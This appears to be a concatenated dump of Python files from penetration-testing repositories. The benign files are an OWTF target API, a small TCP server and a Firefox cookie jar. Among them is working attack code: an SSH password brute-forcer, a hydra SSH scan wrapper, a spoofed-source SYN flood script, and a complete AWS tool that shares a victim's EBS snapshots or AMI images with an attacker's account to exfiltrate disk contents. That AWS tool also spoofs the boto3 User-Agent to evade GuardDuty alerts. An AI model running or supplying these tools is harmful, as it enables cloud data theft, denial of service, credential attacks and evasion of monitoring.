            pass
        ssh.close()
    except Exception,error :
        print error
# Candidate character set for generated passwords.
# NOTE(review): uppercase 'R' is missing from this charset — confirm intentional.
letters_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQSTUVWXYZ1234567890!@#$&()'
for i in bruteforce_list(letters_list, PASS_SIZE):
    # Bug fix: args must be a tuple. args=(i) passed the bare string, so
    # Thread unpacked it character-by-character and attempt() received the
    # wrong number of arguments for any candidate longer than one char.
    t = threading.Thread(target=attempt, args=(i,))
    t.start()
    time.sleep(0.3)  # throttle thread creation
sys.exit(0)
| 24.603448 | 91 | 0.618598 |
owtf | """
owtf.api.handlers.targets
~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from owtf.api.handlers.base import APIRequestHandler
from owtf.lib import exceptions
from owtf.lib.exceptions import InvalidTargetReference, APIError
from owtf.managers.target import (
add_targets,
delete_target,
get_target_config_by_id,
get_target_config_dicts,
get_targets_by_severity_count,
search_target_configs,
update_target,
)
from owtf.api.handlers.jwtauth import jwtauth
__all__ = ["TargetConfigSearchHandler", "TargetSeverityChartHandler", "TargetConfigHandler"]
@jwtauth
class TargetConfigHandler(APIRequestHandler):
"""Manage target config data."""
SUPPORTED_METHODS = ["GET", "POST", "PUT", "PATCH", "DELETE"]
def get(self, target_id=None):
"""Get target config data by id or fetch all target configs.
**Example request**:
.. sourcecode:: http
GET /api/v1/targets/2 HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
{
"status": "success",
"data": {
"top_url": "https://google.com:443",
"top_domain": "com",
"target_url": "https://google.com",
"max_user_rank": 0,
"url_scheme": "https",
"host_path": "google.com",
"ip_url": "https://172.217.10.238",
"host_ip": "172.217.10.238",
"max_owtf_rank": -1,
"port_number": "443",
"host_name": "google.com",
"alternative_ips": "['172.217.10.238']",
"scope": true,
"id": 2
}
}
"""
try:
# If no target_id, means /target is accessed with or without filters
if not target_id:
# Get all filter data here, so that it can be passed
filter_data = dict(self.request.arguments)
self.success(get_target_config_dicts(self.session, filter_data))
else:
self.success(get_target_config_by_id(self.session, target_id))
except InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
def post(self, target_id=None):
"""Add a target to the current session.
**Example request**:
.. sourcecode:: http
POST /api/v1/targets/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 201 Created
Content-Length: 0
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
if (target_id) or (not self.get_argument("target_url", default=None)): # How can one post using an id xD
raise APIError(400, "Incorrect query parameters")
try:
add_targets(self.session, dict(self.request.arguments)["target_url"])
self.set_status(201) # Stands for "201 Created"
self.success(None)
except exceptions.DBIntegrityException:
raise APIError(400, "An unknown exception occurred when performing a DB operation")
except exceptions.UnresolvableTargetException:
raise APIError(400, "The target url can not be resolved")
def put(self, target_id=None):
return self.patch(target_id)
def patch(self, target_id=None):
"""Update a target.
**Example request**:
.. sourcecode:: http
PATCH /api/v1/targets/1 HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
if not target_id or not self.request.arguments:
raise APIError(400, "Incorrect query parameters")
try:
patch_data = dict(self.request.arguments)
update_target(self.session, patch_data, id=target_id)
self.success(None)
except InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
def delete(self, target_id=None):
"""Delete a target.
**Example request**:
.. sourcecode:: http
DELETE /api/v1/targets/4 HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
if not target_id:
raise APIError(400, "Missing target_id")
try:
delete_target(self.session, id=target_id)
self.success(None)
except InvalidTargetReference:
raise APIError(400, "Invalid target reference provided")
@jwtauth
class TargetConfigSearchHandler(APIRequestHandler):
    """Search/filter stored target configurations."""

    SUPPORTED_METHODS = ["GET"]

    def get(self):
        """Return target config records matching the user-supplied filter.

        Query parameters (e.g. ``limit``, ``offset``, ``target_url``) are
        forwarded verbatim to the DB search layer; ``search=True`` is forced
        so the backend performs substring matching.

        **Example request**:

        .. sourcecode:: http

            GET /api/v1/targets/search/?limit=100&offset=0&target_url=google HTTP/1.1
            Accept: application/json, text/javascript, */*; q=0.01
            X-Requested-With: XMLHttpRequest

        **Example response**:

        .. sourcecode:: http

            HTTP/1.1 200 OK
            Content-Type: application/json; charset=UTF-8

            {
                "status": "success",
                "data": {
                    "records_total": 4,
                    "records_filtered": 2,
                    "data": [
                        {
                            "target_url": "https://google.com",
                            "host_ip": "172.217.10.238",
                            "port_number": "443",
                            "scope": true,
                            "id": 2
                        }
                    ]
                }
            }
        """
        # Building the criteria dict cannot raise InvalidParameterType,
        # so it is done outside the try block.
        criteria = dict(self.request.arguments)
        criteria["search"] = True
        try:
            self.success(search_target_configs(self.session, filter_data=criteria))
        except exceptions.InvalidParameterType:
            raise APIError(400, "Invalid parameter type provided")
@jwtauth
class TargetSeverityChartHandler(APIRequestHandler):
    """Serve per-severity target counts for the dashboard chart."""

    SUPPORTED_METHODS = ["GET"]

    def get(self):
        """Return data for the target severity chart.

        **Example request**:

        .. sourcecode:: http

            GET /api/targets/severitychart/ HTTP/1.1
            X-Requested-With: XMLHttpRequest

        **Example response**:

        .. sourcecode:: http

            HTTP/1.1 200 OK
            Content-Type: application/json; charset=UTF-8

            {
                "status": "success",
                "data": {
                    "data": [
                        {"color": "#A9A9A9", "id": 0, "value": 100, "label": "Not Ranked"}
                    ]
                }
            }
        """
        try:
            counts = get_targets_by_severity_count(self.session)
        except exceptions.InvalidParameterType:
            raise APIError(400, "Invalid parameter type provided")
        self.success(counts)
| 30.517123 | 113 | 0.476962 |
Penetration-Testing-Study-Notes | #!/usr/bin/env python
import subprocess
import sys
if len(sys.argv) != 3:
print "Usage: sshrecon.py <ip address> <port>"
sys.exit(0)
ip_address = sys.argv[1].strip()
port = sys.argv[2].strip()
print "INFO: Performing hydra ssh scan against " + ip_address
HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_sshhydra.txt -u %s -s %s ssh" % (ip_address, ip_address, port)
try:
results = subprocess.check_output(HYDRA, shell=True)
resultarr = results.split("\n")
for result in resultarr:
if "login:" in result:
print "[*] Valid ssh credentials found: " + result
except:
print "INFO: No valid ssh credentials found"
| 29.954545 | 140 | 0.670588 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# This script abuses insecure permissions given to the EC2 IAM Role to exfiltrate target EC2's
# filesystem data in a form of it's shared EBS snapshot or publicly exposed AMI image.
#
# CreateSnapshot:
# Abuses:
# ec2:CreateSnapshot
# ec2:ModifySnapshotAttribute
#
# The script will firstly create an EBS volume snapshot of the provided volume id. Then it will
# modify that snapshot's attributes to make it available for the foreign AWS Account that's going to
# be the Attacker's account. Then, the attacker will be able to create an EBS volume out of that snapshot.
# After doing so, the script will stop specified by the Attacker EC2 instance in order to later on attach it
# with a previously created volume. Afterwards, the instance will be restarted and the attacker will be able
# to mount freshly attached volume in the operating system to further examine its contents.
#
# This technique is safe to be demonstrated during AWS Penetration tests.
#
#
# CreateImage:
# Abuses:
# ec2:CreateImage
# ec2:ModifyImageAttribute
#
# NOT FULLY IMPLEMENTED YET.
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
# instance. This image will become publicly available (caution with client sensitive data!). After that, the script
# will attempt to create/import public SSH RSA keys to the attacker's account and then create an EC2 instance using that
# publicly available just created AMI image. Ultimately, the attacker will be able to SSH into newly created box to
# further examine it's filesystem contents.
#
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: Mariusz Banach / mgeeky, '19, <[email protected]>
#
import sys
import pyjq
import json
import time
import boto3
import argparse
from botocore.exceptions import ClientError
config = {
'verbose' : False,
'region' : '',
'victim' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'attacker' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'method' : '',
'volume-id': '',
'instance-id': '',
'attach-instance-id': '',
}
class Logger:
    """Minimal stdout logger with level-prefixed lines.

    Prefixes: ``[>]`` progress, ``[.]`` verbose info, ``[+]`` success,
    ``[-]`` failure, ``[!]`` fatal (also terminates the process).
    """

    @staticmethod
    def _out(message):
        sys.stdout.write(message + '\n')

    @staticmethod
    def out(message):
        Logger._out('[>] ' + message)

    @staticmethod
    def info(message):
        # Verbose-only output, gated on the module-level config flag.
        if config['verbose']:
            Logger._out('[.] ' + message)

    @staticmethod
    def fatal(message):
        # Writes directly so the exit path has no extra indirection.
        sys.stdout.write('[!] ' + message + '\n')
        sys.exit(1)

    @staticmethod
    def fail(message):
        Logger._out('[-] ' + message)

    @staticmethod
    def ok(message):
        Logger._out('[+] ' + message)
class ExfiltrateEC2:
session = None
def __init__(self, region, attacker_keys, victim_keys):
self.region = region
self.keys = {
'attacker' : {},
'victim' : {},
}
self.keys['attacker'] = attacker_keys
self.keys['victim'] = victim_keys
self.session = {
'attacker' : None,
'victim' : None,
}
Logger.info(f"Using region: {region}")
Logger.info("Authenticating using Attacker's AWS credentials...")
self.session['attacker'] = self.authenticate(region, attacker_keys)
Logger.info("Authenticating using Victim's AWS credentials...")
self.session['victim'] = self.authenticate(region, victim_keys)
def authenticate(self, region, keys):
session = None
try:
if keys['profile']:
session = boto3.Session(
profile_name = keys['profile'],
region_name = region
)
else:
session = boto3.Session(
aws_access_key_id = keys['access-key'],
aws_secret_access_key = keys['secret-key'],
aws_session_token = keys['token'],
region_name = region
)
except Exception as e:
Logger.fail(f'Could not authenticate to AWS: {e}')
raise e
return session
def get_session(self, whose):
return self.session[whose]
def get_account_id(self, whose):
try:
return self.session[whose].client('sts').get_caller_identity()['Account']
except Exception as e:
Logger.fatal(f'Could not Get Caller\'s identity: {e}')
def create_snapshot(self, attacker_instance_id, volume_id, availability_zone):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
target_user = self.get_account_id('attacker')
snapshot = None
volume_created = None
modify_result = None
Logger.out(f"Step 1: Creating EBS volume snapshot. VolumeId = {volume_id}")
try:
snapshot = victim_client.create_snapshot(
Description = f'Exfiltrated EBS snapshot of volume: {volume_id}',
VolumeId = volume_id
)
Logger.ok(f"Snapshot of volume {volume_id} created: {snapshot['SnapshotId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateSnapshot action on Victim failed. Exception: {e}")
Logger.out(f"Step 2: Modifying snapshot attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_snapshot_attribute(
Attribute = f'createVolumePermission',
OperationType = 'add',
SnapshotId = snapshot['SnapshotId'],
UserIds = [
target_user,
]
)
Logger.ok(f"Snapshot's attributes modified to share it with user {target_user}")
except Exception as e:
Logger.fatal(f"ec2:ModifySnapshotAttribute action on Victim failed. Exception: {e}")
Logger.out(f"Step 3: Waiting for the snapshot to transit into completed state.")
try:
victim_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot['SnapshotId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for snapshot completed state failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 4: Creating EBS volume in Attacker's {target_user} AWS account.")
attacker_instance_data = None
try:
if not availability_zone:
availability_zone = self.region + 'a'
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
availability_zone = inst['Placement']['AvailabilityZone']
attacker_instance_data = inst
Logger.info(f"Obtained Attacker's EC2 instance Availbility Zone automatically: {availability_zone}")
break
except Exception as e:
Logger.fail(f"THIS MAY BE FATAL: Could not enumerate attacker's instance with given InstanceId = {attacker_instance_id}")
Logger.fail(f"Exception: {e}")
raise e
availability_zone = self.region + 'a'
try:
volume_created = attacker_client.create_volume(
AvailabilityZone = availability_zone,
Encrypted = False,
VolumeType = 'gp2',
SnapshotId = snapshot['SnapshotId']
)
Logger.ok(f"Created EBS volume ({volume_created['VolumeId']} at Attacker's side out from exfiltrated snapshot ({snapshot['SnapshotId']})")
except Exception as e:
Logger.fail(f"ec2:CreateVolume action on Attacker failed. Exception: {e}")
Logger.out(f"Step 5: Waiting for the volume to transit into created state.")
try:
attacker_client.get_waiter('volume_available').wait(VolumeIds=[volume_created['VolumeId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for volume available failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 6: Attaching created EBS volume to Attacker's specified EC2 instance")
try:
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
if 'IncorrectInstanceState' in str(e):
Logger.fail("Attacker's machine is in running state, preventing to attach it a volume.")
Logger.info("Trying to stop the EC2 instance, then attach the volume and then restart it.")
try:
attacker_instance = attacker_client.stop_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_stopped').wait(InstanceIds = [attacker_instance_id, ])
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
Logger.fail("Tried to automatically stop attacker's EC2 instance, then attach volume and restart it, but that failed as well.")
Logger.fail(f"Exception: " + str(e))
Logger.info("Restarting it...")
attacker_instance = attacker_client.start_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_running').wait(InstanceIds = [attacker_instance_id, ])
try:
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
attacker_instance_data = inst
break
except: pass
else:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
try:
Logger.out(f"Cleanup. Trying to remove created snapshot ({snapshot['SnapshotId']}) at Victim's estate...")
victim_client.delete_snapshot(SnapshotId = snapshot['SnapshotId'])
Logger.ok(f"Snapshot removed.")
except Exception as e:
Logger.fail(f"(That's ok) ec2:DeleteSnapshot action on Victim failed. Exception: {e}")
ssh_command = 'SSH to the attacker\'s EC2 instance\n'
if attacker_instance_data:
try:
ip = attacker_instance_data['PublicIpAddress']
except:
Logger.fail(f"Could not obtain Attacker's EC2 Public ip address. Available fields:\n {attacker_instance_data}\n")
ip = "ec2-ip-address"
if ip:
ssh_command = f'''SSH to the attacker's EC2 instance
# ssh ec2-user@{ip}
'''
print(f'''
===============================================================
[MODULE FINISHED]
===============================================================
[+] Exfiltrated snapshot of a victim's EBS volume:
VictimVolumeId = {volume_id}
[+] By creating a snapshot of it, shared to the attacker's AWS user ID.
SnapshotId = {snapshot['SnapshotId']}
If everything went fine, Attacker's AWS account {target_user} should have a EBS volume now:
AttackerVolumeId = {volume_created['VolumeId']}
That was attached to the specified attacker's EC2 instance:
AttackerInstanceId = {attacker_instance_id}
AvailibityZone = {availability_zone}
Most likely as a '/dev/xvdf' device.
===============================================================
To examine exfiltrated data:
0) {ssh_command}
1) List block devices mapped:
# lsblk
2) If above listing yielded mapped block device, e.g. xvdf, create a directory for it:
# mkdir /exfiltrated
3) Mount that device's volume:
# mount /dev/xvdf1 /exfiltrated
4) Review it's contents:
# ls -l /exfiltrated
''')
return True
def create_image(self, instance_id, image_name, image_description):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
created_image = None
try:
Logger.out("Step 1: Creating a publicly available AMI image out of specified EC2 instance.")
created_image = victim_client.create_image(
InstanceId = instance_id,
Name = image_name,
Description = image_description
)
Logger.ok(f"AMI Image with name: ({image_name}) created: {created_image['ImageId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
target_user = self.get_account_id('attacker')
Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_image_attribute(
Attribute = 'launchPermission',
ImageId = created_image['ImageId'],
OperationType = 'add',
UserIds = [
target_user,
]
)
Logger.ok(f"Image's attributes modified to share it with user {target_user}")
except Exception as e:
Logger.fatal(f"ec2:ModifyImageAttribute action on Victim failed. Exception: {e}")
# Step 3: Import custom SSH RSA public key
# client.import_key_pair(
# KeyName = "Some key name"
# PublicKeyMaterial = "key material"
# )
# Step 4: Create an instance from exported AMI
# client.run_instances(
# ImageId = "ami-00000000",
# SecurityGroupIds = ["sg-00000", ],
# SubnetId = "subnet-aaaaaa",
# Count = 1,
# InstanceType = "t2.micro",
# KeyName = "Some key name",
# Query = "Instances[0].InstanceId",
# )
# Returns:
# "i-00001111002222"
# Step 5: Connect to that EC2 instance
# client.describe_instances(
# InstanceIds = ["i-00001111002222"],
# Query = "Reservations[0].Instances[0].PublicIpAddress"
# )
# Returns:
# "1.2.3.4"
#
# $ ssh [email protected]
# $ ls -l
print(f"""
===============================================================
[!] REST OF THE EXPLOIT LOGIC HAS NOT BEEN IMPLEMENTED YET.
===============================================================
[.] You can proceed manually from this point:
1) Create an EC2 instance in region: {self.region}
2) Make sure this EC2 instance is being created out of public AMI image with ID:
Image ID: {created_image['ImageId']}
3) Setup SSH keys, Security Groups, etc.
4) SSH into that machine.
Created EC2 instance's filesystem will be filled with files coming from the exfiltrated EC2.
""")
def parseOptions(argv):
global config
print('''
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz Banach / mgeeky '19, <[email protected]>
''')
parser = argparse.ArgumentParser(prog = argv[0])
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
attacker = parser.add_argument_group('Attacker\'s AWS credentials - where to instantiate exfiltrated EC2')
victim = parser.add_argument_group('Victim AWS credentials - where to find EC2 to exfiltrate')
required.add_argument('--region', type=str, help = 'AWS Region to use.')
attacker.add_argument('--profile', type=str, help = 'Attacker\'s AWS Profile name to use if --access-key was not specified', default = 'default')
attacker.add_argument('--access-key', type=str, help = 'Attacker\'s AWS Access Key ID to use if --profile was not specified')
attacker.add_argument('--secret-key', type=str, help = 'Attacker\'s AWS Secret Key ID')
attacker.add_argument('--token', type=str, help = '(Optional) Attacker\'s AWS temporary session token')
victim.add_argument('--victim-profile', type=str, help = 'Victim\'s AWS Profile name to use if --access-key was not specified')
victim.add_argument('--victim-access-key', type=str, help = 'Victim\'s AWS Access Key ID to use if --profile was not specified')
victim.add_argument('--victim-secret-key', type=str, help = 'Victim\'s AWS Secret Key ID')
victim.add_argument('--victim-token', type=str, help = '(Optional) Victim\'s AWS temporary session token')
optional.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
subparsers = parser.add_subparsers(help='Available methods', dest='method')
a = 'Creates a snapshot of a running or stopped EC2 instance in an AMI image form.'\
' This AMI image will then be shared with another AWS account, constituing exfiltration opportunity.'
createimage = subparsers.add_parser('createimage', help = a)
createimage.add_argument('--instance-id', help = '(Required) Specifies instance id (i-...) to create an image of.')
createimage.add_argument('--image-name', default = "Exfiltrated AMI image", type=str, help = '(Optional) Specifies a name for newly created AMI image. Default: "Exfiltrated AMI image"')
createimage.add_argument('--image-desc', default = "Exfiltrated AMI image", type=str, help = '(Optional) Specifies a description for newly created AMI image. Default: "Exfiltrated AMI image"')
b = 'Creates a snapshot of an EBS volume used by an EC2 instance.'\
' This snapshot will then be shared with another AWS account, constituing exfiltration opportunity.'
createsnapshot = subparsers.add_parser('createsnapshot', help = b)
createsnapshot.add_argument('--volume-id', help = '(Required) Specifies EBS volume id (vol-...) to create a snapshot of.')
createsnapshot.add_argument('--attach-instance-id', help = '(Required) Specifies Attacker\'s instance ID where snapshot should be attached as a volume (i-...). This instance must be created in the same region as specified and must be in a STOPPED state. Otherwise, this script will automatically stop the instance and then restart it after attaching volume.')
createsnapshot.add_argument('--availability-zone', help = '(Optional) Specifies in which Attacker\'s EC2 instance availability zone was placed. If this parameter is not specified, the program will try to invoke ec2:DescribeInstances to find that information automatically.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['region'] = args.region
if args.method == 'createimage':
if args.instance_id != None:
config['instance-id'] = args.instance_id
else:
Logger.fatal('--instance-id parameter is required for this to work.')
if args.method == 'createsnapshot':
if args.volume_id != None and args.attach_instance_id != None:
config['volume-id'] = args.volume_id
config['attach-instance-id'] = args.attach_instance_id
config['availability-zone'] = args.availability_zone
else:
Logger.fatal('--volume-id and --attach-instance-id parameters are required for this to work.')
if not args.region:
Logger.fatal("Please provide AWS region to operate in.")
if args.profile and (args.access_key or args.secret_key or args.token):
Logger.fatal("There should only be used either profile name or raw credentials for Attacker's AWS keys!")
if args.victim_profile and (args.victim_access_key or args.victim_secret_key or args.victim_token):
Logger.fatal("There should only be used either profile name or raw credentials for Victim's AWS keys!")
if args.profile:
config['attacker']['profile'] = args.profile
Logger.info(f"Using attacker's profile: {args.profile}")
elif args.access_key and args.secret_key:
config['attacker']['access-key'] = args.access_key
config['attacker']['secret-key'] = args.secret_key
config['attacker']['token'] = args.token
Logger.info(f"Using passed Attacker's AWS credentials: ******{args.access_key[-6:]}")
else:
Logger.fatal("Both access key and secret key must be specified for Attacker's AWS credentials if profile was not used!")
if args.victim_profile:
config['victim']['profile'] = args.victim_profile
Logger.info(f"Using victim's profile: {args.victim_profile}")
elif args.victim_access_key and args.victim_secret_key:
config['victim']['access-key'] = args.victim_access_key
config['victim']['secret-key'] = args.victim_secret_key
config['victim']['token'] = args.victim_token
Logger.info(f"Using passed Victim's AWS credentials: ******{args.victim_access_key[-6:]}")
else:
Logger.fatal("Both access key and secret key must be specified for Victim's AWS credentials if profile was not used!")
return args
def monkeyPatchBotocoreUserAgent():
    '''
    This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts
    Source:
        https://www.thesubtlety.com/post/patching-boto3-useragent/
    '''
    # Imported lazily so the pytest dependency check runs only when the
    # patch is actually applied.
    import sys
    import boto3
    import botocore
    try:
        from _pytest.monkeypatch import MonkeyPatch
    except (ImportError, ModuleNotFoundError) as e:
        print('[!] Please install "pytest" first: pip3 install pytest')
        print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection')
        sys.exit(0)
    monkeypatch = MonkeyPatch()
    def my_user_agent(self):
        # Generic Boto3/Linux User-Agent string reported instead of the real one.
        return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic"
    # Every botocore session now reports the spoofed User-Agent above.
    monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent)
def main(argv):
    """Entry point: parse CLI options, spoof the boto3 User-Agent, and
    dispatch to the selected exfiltration method.

    :param argv: process argument vector (``sys.argv``).
    :return: ``False`` if option parsing failed, otherwise ``None``.
    """
    opts = parseOptions(argv)
    if not opts:
        # Bug fix: Logger defines no `err` method (only _out/out/info/
        # fatal/fail/ok), so Logger.err raised AttributeError here and
        # masked the real parsing error. Logger.fail prints '[-] ...'.
        Logger.fail('Options parsing failed.')
        return False

    # Avoid the GuardDuty PenTest:IAMUser/KaliLinux finding before the
    # first AWS API call is made.
    monkeyPatchBotocoreUserAgent()

    exp = ExfiltrateEC2(
        opts.region,
        config['attacker'],
        config['victim'],
    )

    if opts.method == 'createimage':
        Logger.info("Abusing ec2:CreateImage...")
        exp.create_image(opts.instance_id, opts.image_name, opts.image_desc)
    elif opts.method == 'createsnapshot':
        Logger.out("Abusing dangerous ec2:CreateSnapshot and ec2:ModifySnapshotAttribute...\n")
        exp.create_snapshot(opts.attach_instance_id, opts.volume_id, opts.availability_zone)
    else:
        Logger.fatal(f"Unknown method specified: {opts.method}")
if __name__ == '__main__':
main(sys.argv)
| 41.534271 | 363 | 0.60357 |
cybersecurity-penetration-testing | import random
from scapy.all import *

# Flood <target>:80 with TCP packets whose source IP is randomized per
# outer iteration (spoofed a.b.c.d, octets 1-254), 50 packets per batch.
# NOTE(review): scapy's TCP() defaults apply here (SYN flag set by
# default) — this effectively behaves as a SYN flood; confirm intent.
target = raw_input("Enter the Target IP ")
i=1
while True:
    # Build one random spoofed source address for this batch.
    a = str(random.randint(1,254))
    b = str(random.randint(1,254))
    c = str(random.randint(1,254))
    d = str(random.randint(1,254))
    dot = "."
    src = a+dot+b+dot+c+dot+d
    print src
    # Pick a random source-port window; only the first 50 ports are used
    # before loop_break aborts the inner loop.
    st = random.randint(1,1000)
    en = random.randint(1000,65535)
    loop_break = 0
    for srcport in range(st,en):
        IP1 = IP(src=src, dst=target)
        TCP1 = TCP(sport=srcport, dport=80)
        pkt = IP1 / TCP1
        # inter=.0001 throttles sends to ~0.1 ms apart.
        send(pkt,inter= .0001)
        print "packet sent ", i
        loop_break = loop_break+1
        i=i+1
        if loop_break ==50 :
            break
| 21 | 42 | 0.649241 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import socket
class SP():
    """Minimal single-client TCP server that ACKs every received chunk."""

    def server(self):
        # NOTE(review): address/port are hard-coded for the lab network —
        # adjust 192.168.1.103:80 before reuse; port 80 needs privileges.
        try:
            s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.bind(('192.168.1.103',80))
            s.listen(1) # Now wait for client connection.
            while True:
                try:
                    c, addr = s.accept()
                    print ('Got connection from', addr)
                    while True:
                        # Receive loop: ACK each chunk until the peer closes.
                        data=c.recv(1024)
                        if data:
                            d=data.decode('utf-8')
                            print("Got data :" +str(d))
                            c.send(str("ACK : " +str(d)+" ...").encode('utf-8'))
                        else:
                            # Empty recv() result means the peer closed the connection.
                            print("No more data from client : " +str(addr))
                            break
                finally:
                    # Close the per-client socket before accepting the next one.
                    c.close()
        except Exception as ex:
            # Any failure (including Ctrl-C-adjacent socket errors) tears
            # down the listening socket and ends the server.
            print("Exception caught :"+str(ex))
            s.close()

obj=SP()
obj.server()
| 21.4375 | 64 | 0.548117 |
PenetrationTestingScripts | """Firefox 3 "cookies.sqlite" cookie persistence.
Copyright 2008 John J Lee <[email protected]>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import logging
import time
from _clientcookie import CookieJar, Cookie, MappingIterator
from _util import isstringlike, experimental
debug = logging.getLogger("mechanize.cookies").debug
class Firefox3CookieJar(CookieJar):
"""Firefox 3 cookie jar.
The cookies are stored in Firefox 3's "cookies.sqlite" format.
Constructor arguments:
filename: filename of cookies.sqlite (typically found at the top level
of a firefox profile directory)
autoconnect: as a convenience, connect to the SQLite cookies database at
Firefox3CookieJar construction time (default True)
policy: an object satisfying the mechanize.CookiePolicy interface
Note that this is NOT a FileCookieJar, and there are no .load(),
.save() or .restore() methods. The database is in sync with the
cookiejar object's state after each public method call.
Following Firefox's own behaviour, session cookies are never saved to
the database.
The file is created, and an sqlite database written to it, if it does
not already exist. The moz_cookies database table is created if it does
not already exist.
"""
# XXX
# handle DatabaseError exceptions
# add a FileCookieJar (explicit .save() / .revert() / .load() methods)
def __init__(self, filename, autoconnect=True, policy=None):
experimental("Firefox3CookieJar is experimental code")
CookieJar.__init__(self, policy)
if filename is not None and not isstringlike(filename):
raise ValueError("filename must be string-like")
self.filename = filename
self._conn = None
if autoconnect:
self.connect()
def connect(self):
import sqlite3 # not available in Python 2.4 stdlib
self._conn = sqlite3.connect(self.filename)
self._conn.isolation_level = "DEFERRED"
self._create_table_if_necessary()
def close(self):
self._conn.close()
def _transaction(self, func):
try:
cur = self._conn.cursor()
try:
result = func(cur)
finally:
cur.close()
except:
self._conn.rollback()
raise
else:
self._conn.commit()
return result
def _execute(self, query, params=()):
return self._transaction(lambda cur: cur.execute(query, params))
def _query(self, query, params=()):
# XXX should we bother with a transaction?
cur = self._conn.cursor()
try:
cur.execute(query, params)
return cur.fetchall()
finally:
cur.close()
def _create_table_if_necessary(self):
self._execute("""\
CREATE TABLE IF NOT EXISTS moz_cookies (id INTEGER PRIMARY KEY, name TEXT,
value TEXT, host TEXT, path TEXT,expiry INTEGER,
lastAccessed INTEGER, isSecure INTEGER, isHttpOnly INTEGER)""")
def _cookie_from_row(self, row):
(pk, name, value, domain, path, expires,
last_accessed, secure, http_only) = row
version = 0
domain = domain.encode("ascii", "ignore")
path = path.encode("ascii", "ignore")
name = name.encode("ascii", "ignore")
value = value.encode("ascii", "ignore")
secure = bool(secure)
# last_accessed isn't a cookie attribute, so isn't added to rest
rest = {}
if http_only:
rest["HttpOnly"] = None
if name == "":
name = value
value = None
initial_dot = domain.startswith(".")
domain_specified = initial_dot
discard = False
if expires == "":
expires = None
discard = True
return Cookie(version, name, value,
None, False,
domain, domain_specified, initial_dot,
path, False,
secure,
expires,
discard,
None,
None,
rest)
def clear(self, domain=None, path=None, name=None):
CookieJar.clear(self, domain, path, name)
where_parts = []
sql_params = []
if domain is not None:
where_parts.append("host = ?")
sql_params.append(domain)
if path is not None:
where_parts.append("path = ?")
sql_params.append(path)
if name is not None:
where_parts.append("name = ?")
sql_params.append(name)
where = " AND ".join(where_parts)
if where:
where = " WHERE " + where
def clear(cur):
cur.execute("DELETE FROM moz_cookies%s" % where,
tuple(sql_params))
self._transaction(clear)
def _row_from_cookie(self, cookie, cur):
expires = cookie.expires
if cookie.discard:
expires = ""
domain = unicode(cookie.domain)
path = unicode(cookie.path)
name = unicode(cookie.name)
